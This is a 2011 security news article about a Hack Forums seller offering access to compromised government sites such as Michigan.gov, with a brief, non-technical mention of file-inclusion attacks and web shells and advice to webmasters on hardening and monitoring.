Michigan.gov and other government sites up for sale
by Steve Ragan - Jan 24 2011, 13:45While most of Indiana was dealing with frozen pipes and single digit temperatures this weekend, the security world was buzzing about an active member of the Hack Forums community. His name is Srblche, and he’s selling backend access to Michigan’s main domain as well as other government sites.
The interest started when Imperva, a data security vendor, posted some redacted screenshots from Srblche’s domain to their blog. Using terms from the redacted images, a simple Google search points you to Srblche’s site. Given that many security reporters and researchers visit HackedForums.net; his offerings are nothing new or shocking.
The news surrounding Imperva’s blog post is still important. It just shouldn’t be taken as an emerging or unexpected problem. As mentioned by reporter and security analyst Brian Krebs, vulnerable domains are a persistent threat to security.
“Amid all of the media and public fascination with threats like Stuxnet and weighty terms such as “cyberwar,” it’s easy to overlook the more humdrum and persistent security threats, such as Web site vulnerabilities,” Krebs wrote in his coverage of Imperva’s discovery.
In the image below, you’ll see the domains Srblche has up for sale and their corresponding prices. It’s interesting to see that Michigan.gov and Michigan’s eLibrary sell for different amounts based on the level of access offered.
With root access on SSH, you can do more with the server than with SQL access alone, so root domains will sell for a higher fee. Military domains seem to command larger fees simply because of what they represent.
The level of access granted for the cracked domains will depend on what Srblche is able to find while scanning. Each domain is cracked using automated tools. To give you an idea, Kaspersky has a blog post on some of the tools used to pull off such attacks.
Sometimes, these attacks can lead to Local File Inclusion or Remote File Inclusion, which is why access is different for each domain. If an RFI/LFI scan is a success then a root shell is uploaded. The image below is an example of the c100 shell that has been uploaded to a server.
Some of the users on Hack Forums call Srblche a ripper. Rippers are people who steal from others and claim the work as their own. Most of the tools that Srblche uses are not his own, and many of the detractors on the forums condemn him for selling access to freely available software.
Other posts report that Srblche is selling access to domains that he did not compromise himself. In truth, several of the domains listed on Srblche.com are freely available in various forum postings. There are also complaints from users who claim he scammed them.
The services offered by Srblche, seen below, are also called into question. Still, he is a highly ranked member in terms of reputation. This weekend, it was suggested that his press coverage will lead to jail time. Since news of his website broke, he has been silent on the forums. We can confirm however, that he is not in any legal trouble at this time.
As mentioned, what Srblche is doing is nothing new. The takeaway lesson is that webmasters need to be vigilant in securing their domains. This includes code hardening and server hardening.
However, no server settings or code is perfect, so constant monitoring and checking is needed, as well as incident response plans. Also, testing your organization’s domains with scanners such as HP’s Scrawlr, or Acunetix is also worth looking into.
Lastly, Srblche was interviewed recently by HP’s Raf Los. You can read the interview here.
Comment on this Story